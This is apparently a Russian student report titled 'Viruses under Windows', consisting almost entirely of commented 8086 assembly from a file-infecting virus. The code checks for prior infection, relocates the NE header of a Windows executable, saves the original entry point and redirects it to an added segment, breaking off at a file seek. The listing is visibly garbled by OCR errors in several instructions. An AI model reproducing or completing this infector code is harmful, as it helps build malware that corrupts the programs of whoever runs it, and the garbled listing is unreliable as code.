Доклад: Вирусы под Windows

mov si.OFFSET temp

push cs

pop es

xor di.di

mov ex, 8

eld

rep cmpsw

jne ok_to_infect

jmp close_exe

Приступим к заражению
ok_to_infect:

Переместим NE-заголовок на 8 байт ближе к началу файла.
; Исправим соответствующие поля старого заголовка
sub WORD PTR [old_hdr+10h],8

sub WORD PTR [old_hdr+3ch],8
sbb WORD PTR [old_hdr+3eh],0

; Исправим значения таблиц в новом заголовке, чтобы переместились
;только заголовок и таблица сегментов (без остальных таблиц)

add WORD PTR [new_hdr+4],8

add WORD PTR [new_hdr+24h],8

add WORD PTR [new_hdr+26h],8

add WORD PTR [new_hdr+28h],8

add WORD PTR [new_hdr+2ah],8

;Сохраним оригинальные значения точек входа CS и IP
push WORD PTR [new_hdr+14h]
pop [hostJp]

pushTWORD PTR [new_hdr+16h]
pop [host_cs]

;Добавим еще один сегмент в таблицу сегментов и установим
;точку входа на его начало

mov WORD PTR [new_hdr+14h],0

inc WORD PTR [new_hdr+1ch]

push WORD PTR [new_hdr+1ch]

pop WORD PTR [new_hdr+16h]

.Переместим указатель чтения/записи в начало файла
;(к старому заголовку)

хог сх.сх

xor dx.dx

mov ax,4200h